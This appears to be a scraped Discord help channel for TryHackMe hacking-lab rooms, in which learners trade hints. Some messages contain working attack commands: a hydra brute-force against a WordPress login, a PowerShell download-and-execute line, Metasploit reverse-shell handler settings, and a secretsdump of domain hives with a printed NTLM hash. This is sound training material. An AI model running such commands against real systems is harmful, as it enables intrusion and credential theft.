#room-hints

1 messages · Page 110 of 1

humble nimbus
#

Ok, if you using nmap, like nmap [IP] [IP]. what are you targeting?

#

the first IP is your own IP and second IP is what?

left thunder
brittle monolith
#

Can anyone tell me how can i make the JS file output vertically?

tender crystal
#

copy paste into a "beautifier", there are many on the internet that you can find by searching "Javascript beautifier"

brittle monolith
tender crystal
#

Well for one thing that 2nd screenshot is from a different browser, it may have a function yours doesn't. I'm unaware of how to format in Inspect Element, but that tab says "formatted" next to it so it may be a feature of that browser's inspector

brittle monolith
green minnowBOT
#

Gave +1 Rep to @tender crystal

brittle monolith
tender crystal
#

Nice! I just tried it and Chrome has it too

#

same icon/button

dense pike
#

I'm stuck on task 4 question 4 of the NetworkServices room. I believe the issue is using smbclient to read a file with spaces in the file name. Any command I run on the file ends up giving an error on just the first word. If anyone has a nudge for me that would be greatly appreciated.

#

I actually did and didn't find anything useful yet but will keep looking 😉

#

I already tried quotes which give an error, using \ isn't correctly escaping anything

#

It's probably obvious but it's eluding me

#

Thanks! That worked.

green minnowBOT
#

Gave +1 Rep to @burnt rivet

dense pike
#

I didn't realize that there could be a difference between the two types of quotes, but that is helpful to know

sharp jewel
#

hello guys i need help on metasploit introduction room

#

i'm trying to use the exploit but it didn't work for me

#

do i have to set any other parameter then rhost ?

#

i think had issue with LHOST i changed

#

is there a payload that i have to use ?

#

done

#

=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

dim fractal
#

hello, in crack the hash room, the last 2 questions in the level 2 section, do i have to use hashcat for it, or am i able to do it with john, ive tried doing it with john a few ways like salted-sha1, hmac-sha1, dynamic24, dynamic25 (i was and still am desperate) but still no luck.
Done the sha512crypt hash, though I'm still losing brain cells with the last question

sterile kestrel
#

I'm in room networkservices2, Task 9 "By default it will test with the "select version()" command, what result does this give you?". The version I get back is not being accepted as correct answer. I also checked here via search and in walkthroughs, and the answer I put in is correct, but it's not being accepted. Any pointer is appreciated.

#

Giving me "Uh-Oh. Your answer is incorrect." Yes, tried a reload.

#

i just re-typed the answer again and it's fine now, so yes, must've been. thanks

fluid owl
#

@lucid junco

spare zealot
#

can u ping that IP ?

lucid junco
#

Silly question, I know.

fluid owl
#

taskl 6

fluid owl
spare zealot
#

then it's not the right VM

#

see how task 6 has the button active?

#

when u deploy a machine it fades a little

lucid junco
#

Task 6 is smpt7

#

It's the correct VM.

fluid owl
#

is it offline?

#

or is the problem on my side

spare zealot
#

can you try via OPENVPN?

lucid junco
#

Try reboot the VM

fluid owl
#

wait

#

maybe ik what it is

#

brb

spare zealot
#

I'm gonna take a guess and say that u have a firewall or VPN active that filters the packets you try to send

lucid junco
#

I can't ping it either.

spare zealot
#

had a similar issue when I used a firewall on KDE plasma

#

If you can't ping it's as if there is no tunnel between your host and the machine you are trying to attack

lucid junco
#

I'm aware of that, lol

#

So I booted up my VM, connected to the vpn first.

#

Then booted up my own and can ping my own.

fluid owl
#

im still lost

lucid junco
fluid owl
#

tried to restart it multiple times

lucid junco
#

The red terminate button?

#

Or is it not terminating?

fluid owl
#

it is terminating but it just doesnt work

fluid owl
tight mesa
#

Hi guys I'm struggling to remote in to the machine in the windows fundamentals 1 room. I know I've managed to do it in the past but cant for the life of me remember how. I tried to ssh in from the attack box but that didn't seem to work. Any tips? Even a clue so I can find my own way. Thanks

#

They weren't so much instructions I found as they were just explaining what remote access was. Unless I've totally skimmed over it. I'll have another look. thanks

#

Ah right ok I'll try that

#

Yeah I'm gonna look at that again. I did have a quick scan but didn't read it word for word because I was just looking for the instructions but I'll have another read.

#

@burnt rivet Yeah no that article just explains what RDP is but doesn't provide any info on how to actually connect.

#

ok cool. Believe it or not I'm actually just finishing up my 2nd year of computer science at Uni but we've not covered this. I know google is a useful tool however. So am I wrong in trying to ssh in from the attack box terminal? I tried that but it didn't work.

#

I'll try and search for that though. Thanks for your patience.

#

Ah right

#

I know nothing about windows tbh because I'v'e always used mac. It becomes problematic at times ha ha

mighty root
tight mesa
#

Ah cool and do you install that in the attack box or your own machine? I tried that via the attack box but couldn’t open the gui for some reason.

crystal cairn
tight mesa
crystal cairn
heady gyro
#

Hi. I'm doing the https://tryhackme.com/room/uploadvulns
Upload Vulnerabilities room
I'm at task 8
and I couldn't find the directory to which my files are being uploaded to.
I ran gobuster, and I found out there's /privacy and /assets but I couldn't fine my files there.
I did find out that any file extension aside from .jpeg causes an internal server error (500) so I uploaded a .jpeg file but I can't find it.
I also ran gobuster on the URIs it found before but nothing new...
would like a small hint 🙂

#

EDIT: any file gets me to ?submit=failure and images files all get me to code error 500 unless it's jpeg and then it's ?submit=failure as well.
I really am out of ideas

#

on one writeup (thedutchhacker) they uploaded a file .php5 and it was visible in the /privacy directory under a different name. I still see nothing there doing exactly the same.

mighty root
heady gyro
jolly inlet
#

the scp command does nothing

left thunder
jolly inlet
#

nm i did a dumb

left thunder
jolly inlet
#

forgot the .

#

Thank you for the help

jolly inlet
#

what am i doing wrong here (i already have the flag from the site but cant get it through telnet)

left thunder
#

Because if you only press 1 time, it's jumping in a newline where you could add another header, and then basically times out

jolly inlet
#

thats what it is thank you

#

time for a break

next estuary
#

Was anyone able to solve this room? https://tryhackme.com/room/btredlinejoxr3d I´m stuck on creating a standard collector in redline and it get´s stuck on creating a new analysis session aswell
is this room or bugged or so?

hexed jasper
#

howdy folks, I'm in the intro to shells room, have the windows VM up. I'm RDPed into it, but I can't seem to get netcat or socat to run...Obviously missing something easy here. How do I run either of those commands? I've tried in powershell and cmd.exe so far.

hexed jasper
#

nvm, just had to run the commands from the directory they're in (C:\Tools)

white salmon
#

hey guys

#

i got the shell but now im trying to get output

#

there must be a flag instead of root users

#

whats the problem

heady gyro
#

hi.
I'm doing this room https://tryhackme.com/room/cyberheroes
and I'm quite at the beginning.
I got to the website and I saw that there's a username and a password in the JS function that is called when I click login
but they didn't work, nor did their reversing string worked.
I'm kinda stuck. gobuster didn't bring much. nmap just the 80 and 22 ports.
Any hints?

#

Not really experienced with JS but I'll try that. thanks.

green minnowBOT
#

Gave +1 Rep to @dusk totem

heady gyro
#

okay yeah I really should have just read further down the function
thanks!

green minnowBOT
#

Gave +1 Rep to @dusk totem

white salmon
#

Linux Forensics Task 6 Question 1 broken?

pallid moss
#

It worked when I tested it last week 😄

pallid moss
heady gyro
#

question:
what data format is this?
{"company":"The Best Festival Company", "username":"santa"}
I'm doing the https://tryhackme.com/room/learncyberin25days task three.
the answer is 4 characters long.
I tried "dict" but it didn't work. and it seems like a dict to me.

cedar anvil
surreal siren
#

hello looking for some thoughts on why hydra might not be working effectively for me. I am trying the Mr Robot room.

#

it keeps coming back with eroneous results, IE - telling me every password is valid. Could I paste my command here or would that be a spoiler?

#

||hydra -l Elliot -P fsocity.dic 10.10.27.130 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you enterred for the username Elliot is incorrect." -t 30||

#

that command just gives me the first 30 results in the dic file. lol

#

thank you. i will try that!

#

ok i will have to keep investigating then. Would that have something to do with the expected return or another portion that im missing all together?

#

ok cool. thats what i wanted. jsut a hint HAHA.. thank you. I'll go reassess in burp.

toxic glacier
#

https://tryhackme.com/room/uploadvulns task 7... I've tried posting image files and php files with various names and extensions, but nothing uploads correctly. Either 302 location: /?submit=failure or 500 error.

#

To be clear, I modified the filter JS in Burpsuite so the browser does post to the server. In burpsuite I've tried changing the post in various ways but nothing gets accepted.

crimson saddle
#

@toxic glacier You're unable to upload anything to the server? Have you tried first uploading a genuine file (of the whitelisted format) and accessing it before attempting to manipulate the page contents?

toxic glacier
#

I just started a new machine, and used Firefox to upload a genuine PNG. That did succeed. It kept failing on the previous machine.

#

so now I'll investigate further. Thanks!

crimson saddle
toxic glacier
jaunty cloud
#

im in snort -learn how to use snort to detect

#

task 5... this happened yesterday as well.. anytime i try to run a command, this is the response

#

and i just started that box and that was the first command

#

🙂

#

simply ran the command given and it should be outputting traffic but says the file isnt there

#

haha also needed sudo

#

dummy

heady gyro
#

Hi. doing the room (task 4)https://tryhackme.com/room/networkservices2
I was able to transfer the bash binary to the user at the target machine as you can see in the screen shot. and it has the required privileges (the file) yet when I run it I don't get root shell and remain the user...
any idea what I could have done wrong?

heady gyro
#

Did I have to do all those actions as a root user?
I just used sudo I thought it'd be same

alpine kestrel
heady gyro
#

oh that's right thank you
forgot the +s

green minnowBOT
#

Gave +1 Rep to @burnt rivet

alpine kestrel
#

no problem

surreal siren
#

ok i have finally solved the Mr Robot room. I have one outstanding question tho... Through trying to figure the room out and what to do I decoded some bits out of the ||fsocity.dic|| file that is given and it decoded to a gif89a file. Is this coincidence or is there more to this file that advertised?

#

(this in NO way helped me actually solve Mr Robot, just thought it was a strange oddity to find with no mention)

tranquil otter
#

Doing the OWASP Top 10 room and i'm on task 16, it's asking me where is falcon's SSH key located in /etc/passwd, what should I be looking out for to find it?

stuck fractal
civic ridge
#

is it possible to do privesc if I have sudo on /bin/ls? thanks

half nacelle
#

So I finished the rick and morty CTF, but is there a way to view the pages that "Only the REAL rick can view"?

civic ridge
#

thanks bro.

green minnowBOT
#

Gave +1 Rep to @quartz stratus

fringe kettle
#

What is the username of who you're logged in as on your deployed Linux machine? - when you run command onn machine ( whoami) he show you ( root) but answer is (tryhackme) . is it mistake or just i am dumb ?:D

white salmon
#

Have you connected with SSH to the diployed machine?

fringe kettle
#

run us recommend

#

oh f. i use THM AttackBox XD

#

sorry my bad

dim fractal
#

hello, im in metasploit exploitation, msfvenom section. Ive done a handler and have used over 5/6 payloads, when i try and execute them on the target system I get "Segmentation fault (core dumped)" error on all the payloads ive used, am i using the wrong payloads or incorrectly executing them?

alpine kestrel
dim fractal
#

ahh that should help, thanks for that @alpine kestrel

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

no problem

wind peak
#

Hello people doing network services2 task 3. Don't need a hint really just wondering how long the Nmap scan takes. Been waiting almost an hour

deep brook
#

try using -T5 with it

warped rune
#

Hi - Doing MetasploitExploit but I cant seem to get past this handler failed

#

oh god

#

i had a netcat open in another tab thanks

green minnowBOT
#

Gave +1 Rep to @burnt rivet

wind peak
green minnowBOT
#

Gave +1 Rep to @deep brook

deep brook
#

np

wintry pumice
#

Hi - I'm doing Skynet and I'm working on the flags, I've been assuming from the prev question that I'm looking for rfi, but I don't see anything in searchsploit and nothings jumping out at me in the squirrelmail pages. am I looking in the right places?

#

yes

wind peak
#

Network Services 2 Task4 Exploiting NFS I downloaded the bash file and did the root etc but I can't get the permission to end in sr-x. Mine ends in Sr with no X

wintry pumice
#

yes (I don't know how to black stuff out, so I'm trying not to be specific)

#

thanks! ||i found the samba password, but I didn't see how that got me to the flags||

green minnowBOT
#

Gave +1 Rep to @burnt rivet

wintry pumice
#

||i logged into milesdyson with them and got the name of the hidden directory||

#

||i logged into milesdyson with them and got the name of the hidden directory||

wind peak
#

@burnt rivet I tried + the corresponding letter in caps and in common. No diff

#

Unless I'm not understanding what the link means

#

😢

#

Finally understood your hint

#

Thanks

wintry pumice
#

thank you!

green minnowBOT
#

Gave +1 Rep to @burnt rivet

wind peak
#

the smtp room is kicking my ass. i guess this is where i take a break

#

brain is done for

#

-_-

wind peak
#

i think i need to do that metasploit room

jolly inlet
jolly inlet
#

okay that has worked but why?

#

is it because there is no schedule?

cold eagle
jolly inlet
#

okay noted thank you for you time

cold eagle
naive hound
#

I am having a hard time with Security Operations Task 3 in building a firewall

outer violet
hidden verge
#

How do you get the .RUN command to work? It doesn't work in my Attack box at all

green minnowBOT
#

Gave +1 Rep to @burnt rivet

hidden verge
#

In the security analyst path, enumerating telnet isn't working correctly in my opinion. I have completed it, but only from google searching. Port 8012 doesn't come up because there at 8 ports open and none of them are 8012.
Following up with Exploiting Telnet is even worse. Starting the tcpdump worked, however .RUN says No Command Found.

#

This is the question as it is written: 'Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)'

alpine kestrel
hidden verge
#

Thanks @alpine kestrel

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

might not work if you use your own attacking vm instead of the attackbox for weird reasons

hidden verge
#

I did and I get the error .RUN: No Command Found

#

@burnt rivet That's completely possible 😄

#

@burnt rivet It wasn't giving me a target machine

#

@burnt rivet I read them over and over, trust me. I used "start machine" but the only machine that started up and gave me an IP was the Attackbox

#

I'm aware there are 2 buttons

#

Yes, thank you. I started both and had the same error. However, I'll refresh and start over to see if I get different results. Appreciate the help!

#

@burnt rivet just to show you, this is the target IP and .RUN doesn't work

alpine kestrel
#

headdesk

#

common mistake right there

hidden verge
#

It doesn't say where to run it, tho. So how am I missing something that isn't stated?

#

I'm not looking at the online writeups. I am going through the learning and I just did enumerating SMB. I'm sorry people find mistakes funny, but I thought we were here to learn.

#

That was yesterday and then I've come back to redo the material again. I go through everything multiple times since I'm trying to advance my career in I.T.
Sorry, I misread an above message where someone laughed and said "common mistake". I realize now it wasn't directed towards this discussion. I apologize for my oversight.

left thunder
hidden verge
#

@left thunder Yes I did. It's fine. I'll just start over from the beginning of this Network Services module and try again.

left thunder
hidden verge
#

@left thunder Thank you for understanding. I am a little frustrated because this will be my 4th attempt this morning. I am hoping I'm about to catch something I missed. 5th times the charm lol

green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
hidden verge
#

Just to ensure I'm correct in my commands for the Enumerating Telnet, the first question asks How many ports are open? I should be getting this info via: sudo nmap [target ip] -p
Is this correct?

umbral umbra
#

Read the man and info pages a bit closer to understand how nuances of specifying a port range

hidden verge
#

Ok, and when I run that it shows 3 open ports but none of them are 8012. I only know this because I searched for a write up. Then I performed a search for the port 8012 and it shows as closed. This is where the trouble starts @left thunder

left thunder
hidden verge
#

But that's the iP for my target machine that it gives me. Not the attack box

left thunder
#

What's the title of your target machine in the "active machine information" box that's looking like that:

hidden verge
#

polosmb3

left thunder
# hidden verge polosmb3

That's the target machine from task 3, you have to terminate that and start the new target machine in task 6

hidden verge
#

Right but I started the module over because when I start from task 6 I got told to go back and enumerate

left thunder
hidden verge
#

I'm sorry I just checked - I'm in task 6

#

I'll restart the machine again

left thunder
tranquil otter
#

Anyone have any idea how long the OWASP Juice Shop password bruteforce should take?

surreal siren
#

question about the Linux Strength Training room. I am trying to use the gpg command to decrypt files and i keep getting permissions errors.

Errors:
|| gpg: keybox '/home/sarah/.gnupg/pubring.kbx' created
gpg: WARNING: no command supplied. Trying to guess what you mean ...
gpg: AES256 encrypted data
gpg: problem with the agent: Permission denied
gpg: encrypted with 1 passphrase
gpg: decryption failed: No secret key
||

#

What am i missing here? There is no way to put in a password/key according to the gpg --help option. Thank you!

deep brook
#

do u need sudo?

tight mesa
#

Hey guys, I’m currently working through the network services room and am on task 8 enumerating telnet. It asks you to do a port scan however when I do it’s taking ages and although I keep returning to the computer the machine keeps terminating or the attack box keeps disconnecting. Is there a quicker port scan I can do? So far -sT and -sS have returned nothing useful -sV was taking ages and I tried just nmap -p- also

#

Nothing because I disconnected before it completed. Was estimating on it was going to take like 3 hrs or something.

#

Everytime I checked the estimation got bigger

left thunder
#

!docs verify

proud scarabBOT
tight mesa
#

Ah excellent I’ll try that thanks

tight mesa
#

-T4 definitely it Ely seems to be doing the trick. Scans running much faster

#

It Ely was a typo btw lol

trim badger
#

I'm currently in the "Relevant" room. I've never dealt with python before but an error comes up with :

File "42315.py", line 2, in <module> from impacket import smb, smbconnection ImportError: No module named impacket

#

I don't know if there's a pip package called 'impacket' or if that's what it's trying to tell me.

#

Please bare with me. I am completely brand new to everything.
I'm 34 years old and just started learning all of this in February of this year, lol.

#

whatever <module> is... i'm guessing that's some kind of library for python to use.

#

and I've used pip maybe twice since February...

#

I find Information about the module but i'm not sure how to install it, other than source code (which I have no clue how to use, or where to put it)

#

Code frightens me

cedar anvil
trim badger
#

Awesome. I was hoping it'd be that simple 💜

#

I think I installed it as root or something. There's a conflict in what they're both telling me

#

Pip says it's there, python says 'no'

cedar anvil
#

are you on the attackbox or your own machine

trim badger
#

My own machine, Kali

#

Python 1 and 3 have syntax errors with the script

Python 2 reads it fine, seems like, but can't find impacket

cedar anvil
#

yeh, if you're running the script with python2, you'll have to use pip2
similarly pip3 for python3

trim badger
#

I don't know if there's errors with those, it says "timeout" and gives multiple lines

I assume that it means bad syntax

#

I see

#

Oh my

cedar anvil
#

👀

trim badger
#

Bury me.

#

Unknown distro options: "extras_requires and install_requires"

#

Are those other modules?

cedar anvil
#

do you see a requirements.txt by any chance?

trim badger
#

I'm not sure where those would be

cedar anvil
#

in the directory where your script is

#

they make the modules easier to install with just a
pip install -r requirements.txt

trim badger
#

No, I just downloaded a script for a cve

cedar anvil
#

can you share the link for the script

trim badger
#

Got it from searchsploit: eternal blue

#

It's proving to be more complex than I thought, not using metasploit and doing everything manually

#

Guess I'm not ready for the OSCP haha....

cedar anvil
#

42031.py?

trim badger
#

42315

#

God my folders a mess now

cedar anvil
#

yeh, the no msf/sqlmap part would suck I guess

trim badger
#

Yeah, I'm trying...

#

Obviously my knowledge is too limited for this, yet

#

I've been doing easy boxes for months now. You'd think I'd have this locked in

#

I don't know what I messed up with pip and python.

It seems to be missing a lot of important stuff

cedar anvil
#

yep, dependency hell is very common

trim badger
#

I have a "pycache" in my notes folder now, whoops...

#

No clue

cedar anvil
#

did you try using a virtualenv?

trim badger
#

Lol yeah..

trim badger
cedar anvil
#

yeh, it's to separate different versions of packages and modules

#

so they don't break each other

trim badger
#

⚰️

cedar anvil
#

pretty simple stuff imo

trim badger
#

I hope that I don't need a fresh box

#

Reinstall... I don't think I'm able to pick through everything and remove it all to start fresh

#

I do that a lot

cedar anvil
#

yeh, I've got the script work locally

trim badger
#

Wtf

cedar anvil
#

👀

umbral umbra
#

Virtual environments are definitely the 'right' way to manage pip installed modules

trim badger
#

I don't understand programs.
I have googled but it's above my understanding

umbral umbra
#

often, different pip packages will have conflicting dependency versions. And you will hate life trying to detangle that dumpster fire. Just use a venv for each 'project' you want a py interpreter for

trim badger
# cedar anvil

I got the same result, but it's still missing the module.. and other modules, apparently

trim badger
#

I'm probably gonna have to start with a fresh vm... Damnit

umbral umbra
#

And there is a huge difference between py2 and py3. Learn to differentiate between them, and either migrate a py2 script to 3, or learn to manage a py2 environment alongside your typical py3 environments.

trim badger
#

I literally have zero knowledge of anything IT related. I don't understand any of the documentation for these programming languages or what they do.

I didn't know what a library was until about 3 months ago

#

Google only helps me with CVE lookup lol... I'm in over my head with using python.

Not sure if I need to learn the language or....

velvet whale
#

Get yourself a python book and get some basic knowledge down. It will go a long way when you get to more advanced stuff.

trim badger
trim badger
#

Barely a script kiddie. "Script fetus"

velvet whale
#

these should set you right if you spend some time with them

trim badger
#

I'll have to reinstall my VM first, to avoid any more conflicts but I will definitely research this. Thank you for the pointer

velvet whale
#

I'm still relatively new to python as well. Happy to help.

trim badger
#

I just don't know how I broke something I've never messed with

velvet whale
#

Thanks, as always. 🙂

green minnowBOT
#

Gave +1 Rep to @burnt rivet

trim badger
#

I don't want to wipe this thing...

#

All my notes

velvet whale
#

I say this as someone who did the same thing...

trim badger
#

I think I've hit the point where I'm not sure if I'm able to really do this

I want to but I feel like I'm starting way too late

#

Sorry if this is not within the scope of the channel

outer violet
trim badger
#

It's something I've always wanted but never knew how.

outer violet
#

I never knew how to start. I'm 34 and just about to start my first IT job

left thunder
trim badger
#

Don't let your dreams be dreams

jaunty cloud
#

im in crack the hash

#

for some reason its not letting me post pics on here... but i have a text file with the hash $2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom and when i run cat hash.txt it only outputs y2
any idea on this?

jaunty cloud
#

? Any help guys. Storing a hash in a txt file and when I cat it just shows y2

tulip mural
#

!docs verify

proud scarabBOT
iron sand
#

In File Inclusion room task 4. What am I doing wrong? The hint says to enter invalid input and check the error messages. What message?

#

The only 8 character word in the error message is function, and that is not the correct answer.

#

Do you see it on the screenshot I posted?

#

Thanks.

green minnowBOT
#

Gave +1 Rep to @dusk totem

jaunty cloud
#

crack the hash here is the hash i am storing

#

but when i cat hash.txt, it only outputs y2

#

and im not able to use hashcat on it

#

seems to have have a host machine problem, i am able to cat it now after i restarted machine

#

see if i can crack the hash now

jaunty cloud
#

a simple try of using hashcat on my host machine

#

here is the command on my computer

#

and its been hanging like this for minutes

#

the hash is 5f4dcc3b5aa765d61d8327deb882cf99 and i have it stored in hash1.txt

#

and i also have rockyou.txt in the same folder

#

this might be a hint

#

downloading cuda sdk toolkit as we speak and seeing if that will help

vernal roost
#

Hi,
i did "year of the rabbit". I would like to know how you found the CVE-2019-14287

Linpeas told me there is something but the link is not working
└─$ grep -ri Sudo linpeas.txt
╔══════════╣ Sudo version
https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.10p3

I just want to understand the way you verified vuln for sudo
searchsploit did not show CVE-2019-14287

#

┌──(kali㉿kali)-[~/tryhackme/raz0rblack/nfs_user_directory]
└─$ searchsploit Sudo -w | grep 47502
sudo 1.8.27 - Security Bypass | https://www.exploit-db.com/exploits/47502

so you just used searchsploit and read the result carefully 🙂

#

i feel dumb

#

thank you

#

like me after i miss read searchsploit... but i took me a while to finally find it (i read a walkthrough which is not glorious)
that's why i'm interrested to know how you did 🙂

old cargo
#

Ok, this is hella awkward, but I don't remember the login info for the linux fundimentals1 room... can someone point me in the right direction to find it?

#

I just need the VM login stuff.

steady stratus
#

It should automatically log you in

old cargo
#

it did not...

#

:/

steady stratus
#

Can you share a screenshot of what you see please?

#

!docs verify

proud scarabBOT
steady stratus
#

to send pics ^

#

Have you started this VM via the green button?

old cargo
#

I did.

#

I'll try resetting the vm

steady stratus
#

Sure

#

A screenshot of what you see would be very useful though (:

old cargo
steady stratus
#

Ah

old cargo
#

it's a yikes. Resetting vm now

steady stratus
#

It is that problem

old cargo
#

I did something stupid easy, way too wrong?

steady stratus
#

No no, bare with me. It is a bit of a rare occurrence on our side -- not your fault

old cargo
#

😮

steady stratus
#

Are you familiar with loging in via SSH by any chance?

old cargo
#

I've done it a few times, but I never memorized the code

#

The vm is restarting now. Once it's up, I'll let you know

#

Well, the turning it on and off worked

#

lol

steady stratus
#

Oh it did?

old cargo
#

yeah

steady stratus
#

You're in the VM okay?

#

ah perfect

#

okay

#

that's an odd one

old cargo
#

Thank you though 😄

steady stratus
#

I've raised it anyway

old cargo
#

Weird shit happens with me.

#

I'm wiccan

steady stratus
#

😄

#

Let us know if it happens again (after terminating and re-deploying the machine)

#

it's a very weird and specific bug

old cargo
#

Wait

#

I think I know the issue.

#

On the off chance I opened an attack box at the same time I opened the VM, would that force the VM to not login properly?

#

Since the program would assume I'm finding my way in?

steady stratus
#

Nah, that should be okay

old cargo
#

oh ok

jolly inlet
jolly inlet
#

xfreerdp /u:user /p:password /cert:ignore /v:targetip

#

i found it

trim badger
#

Does anyone know the "alternative" path in the Relevant room?

I think I might be on the right track, or it's just another red herring.

I dunno... My nmap says one thing but the python "checker" is saying otherwise. [wink, wink].

It's Windows Server 2016, if that makes it more clear.

Just a "Yae or Nae", or some small hint?

#

And this exploit "was big news back in the day, developed by a govt agency and then leaked"

Am I on the right track, at least?

#

Metasploit scanner says that it's vulnerable. Nmap says it's vulnerable

"If it walks like a duck and quacks like a duck..."

vale island
#

An alternative path to the BLUE room in THM is that you can exploit the RDP directly since it is an old windows server and completely bypass all the SMB. try to rund both exploits from armitage under exploit/windows/rdp and it should give you a meterpreter, and make an admin shell in wich u can type net users Adminstrator "your pass" then net users Administrator /active:yes and get the root hash!

ripe hedge
#

unless it requires batteries, then you've got the wrong abstraction

ripe hedge
#

Windows logs a bunch of things. Some of them are even helpful, IIRC

white salmon
#

Hi guys

#

anyone a hint, what codename could mean

alpine kestrel
late vine
#

Sometimes I feel like I need to back and play Monkey Island to get into the mindset of some of these rooms.

white salmon
#

hmm

white salmon
#

Hello everybody i'm in linprivesc room i'm doing the task 5 (privilege escalation kernel exploits) i've found a good exploit but i cant send the exploit into the machine using wget. Does anyone could help me ?Thx ❤️

proud scarabBOT
white salmon
#

y sure

#

oh for real ? how can we ssh if there isnt internet access ?

#

But thx for this information

green minnowBOT
#

Gave +1 Rep to @burnt rivet

white salmon
#

okey bro ! but how should i download exploit (or any file) if there isn't internet acces ?

left thunder
vernal roost
#

hi, i'm doing razorback.
i extracted the hashes from ntds and system.hive but and trying them against lvetrova user though smb
I wonder why it works as the hashes from ntds and system do not contain user vetrova (i used grep to see if there is a hash for that user). did i miss something ?

┌──(kali㉿kali)-[~/tryhackme/raz0rblack/smb_trash]
└─$ impacket-secretsdump -system system.hive -ntds ntds.dit LOCAL > pass_hash.txt

┌──(kali㉿kali)-[~/tryhackme/raz0rblack/smb_trash]
└─$ grep -ri vetrova pass_hash.txt

the working hash is for n.cox user no ???
┌──(kali㉿kali)-[~/tryhackme/raz0rblack/smb_trash]
└─$ grep -ri 16c431d pass_hash.txt
RAZ0RBLACK\n.cox:4612:aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d:::

cedar anvil
vernal roost
#

do you have the same result ?

cedar anvil
#

nope

#

I used the sam and system hives

vernal roost
#

you got the SAM and SYSTEM in the SMB trash, no ?

cedar anvil
#

I don't remember how I got 'em but that's what I used when I did the room

vernal roost
#

OK
in the hashes i got this line
RAZ0RBLACK\n.cox:4612:aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d:::

n.cox is the user no ?

cedar anvil
#

I don't have that user in my notes, I don't think that's a valid user

vernal roost
#

it comes from : impacket-secretsdump -system system.hive -ntds ntds.dit LOCAL > pass_hash.txt
so this user is in the file, no ? i really do not undertand why using this hash works for lvetrova user

#

i have a working solution but do not understand it. it makes me mad 😛

cedar anvil
#

Can you you see the Sam file anywhere

cedar anvil
#

You can verify to send images etc.

#

!docs verify

proud scarabBOT
cedar anvil
#

aahh 😦

#

file deleted

vernal roost
#

?

cedar anvil
vernal roost
#

wtf

cedar anvil
#

maybe they don't allow system passwords/hashes and stuff

vernal roost
#

there is the zip

#

do you still have the password ?

cedar anvil
#

I've got the extracted folder already :)

#

oh these ones

vernal roost
#

i'm reading some walkthrough and people always do "cat hashes | cut -d ':' -f 4". So they did not care of users

cedar anvil
#

yeh, sorry kind of a spoiler, you find different ones later

#

yeh, it's password reuse

vernal roost
#

ohhh again !!!

cedar anvil
vernal roost
#

second i was stucked in that room because of password reuse

vernal roost
cedar anvil
#

nah,

vernal roost
#

then i bruteforce with all hashes and it worked but i did know why

cedar anvil
#

just needs a little more oomph(effort)

vernal roost
#

grrrr, i was also stuck in the second step (SMB access) because i did not verify found password againt all users

cedar anvil
#

yeh, crackmapexec does a good job at password spraying

vernal roost
#

thank you for the explanantion, i was going mad 🙂
can i give you a point in the room ?

cedar anvil
#

Ah not sure what you mean by point in the room

vernal roost
#

i saw that kind of message

🚨 Robocop 🚨
BOT

Today at 12:16 AM
Gave +1 Rep to @burnt rivet

cedar anvil
#

oh yeh, just do thanks @vernal roost

vernal roost
#

do not know if there is a ranking for good chat member

green minnowBOT
#

Gave +1 Rep to @vernal roost

cedar anvil
#

it's pretty useless ngl

vernal roost
#

thanls @cedar anvil

cedar anvil
#

but virtual internet points

vernal roost
#

thanks @cedar anvil

green minnowBOT
#

Gave +1 Rep to @cedar anvil

vernal roost
#

ok, but it is all i can do for you

cedar anvil
modest wasp
#

hi, i'm a bit stuck on task 2 obtaining meterpreter shell in the alfred room...not able to get the reverse shell to execute...despite getting a 200 code from the python web server i'm seeing an ampersand error in the Jenkins console...`C:\Program Files (x86)\Jenkins\workspace\project>powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.57.72:8000/alfred.exe')
Invoke-Expression : Ampersand not allowed. The & operator is reserved for futur
e use; use "&" to pass ampersand as a string.
At line:1 char:4

  • iex <<<< (New-Object Net.WebClient).DownloadString('http://10.10.57.72:8000/
    alfred.exe')
    • CategoryInfo : ParserError: (:) [Invoke-Expression], ParseExcep
      tion
    • FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Command
      s.InvokeExpressionCommand`
modern ibex
#

Hi all, Im having trouble in Windows Fundamentals 1. One of the questions is:
Besides Clock and Network, what other icon is visible in the Notification Area?

#

I ve put in a lot of different things, not sure exactly what it is looking for

left thunder
modern ibex
#

Yes I've been looking through there now

#

this is what mind shows:

#

nvm cant upload an image

left thunder
#

!docs verify

proud scarabBOT
modern ibex
#

thanks

#

I dont have any hidden icons

left thunder
#

But I was struggling with that too, that's why I refereed you to the brief documentation, that should easily give you the answer.

modern ibex
#

Ill read through again

left thunder
# modern ibex Ill read through again

Could you let me have the full URL of the page you are currently on and trying to find the answer?
So the one currently in your URL bar, not the one linked in the task

left thunder
stuck fractal
modest wasp
stuck fractal
warm falcon
#

Hi I try to use whois for facebook.com and for other domains except that on the terminal it tells me that the network is inaccessible is that normal ?

#

On the room it is not to mark that it is necessary to subscribe

#

it's marked that the room is free

stuck fractal
#

The attackbox does not have internet unless you subscribe

#

You can complete the room without subscribing, you just cannot use the attackbox for it

warm falcon
modest wasp
stuck fractal
modest wasp
#

Is it possible to chain metasploit commands as in: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.13.236 set LPORT 7000 run The above doesn't seem to work when entered in the msfconsole however, the instructions present it as if it was one command line

modest wasp
modest wasp
modest wasp
modest wasp
modest wasp
# stuck fractal Similar. It provides the example. It's still using Powershell's invoke web reque...

my listener: `msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
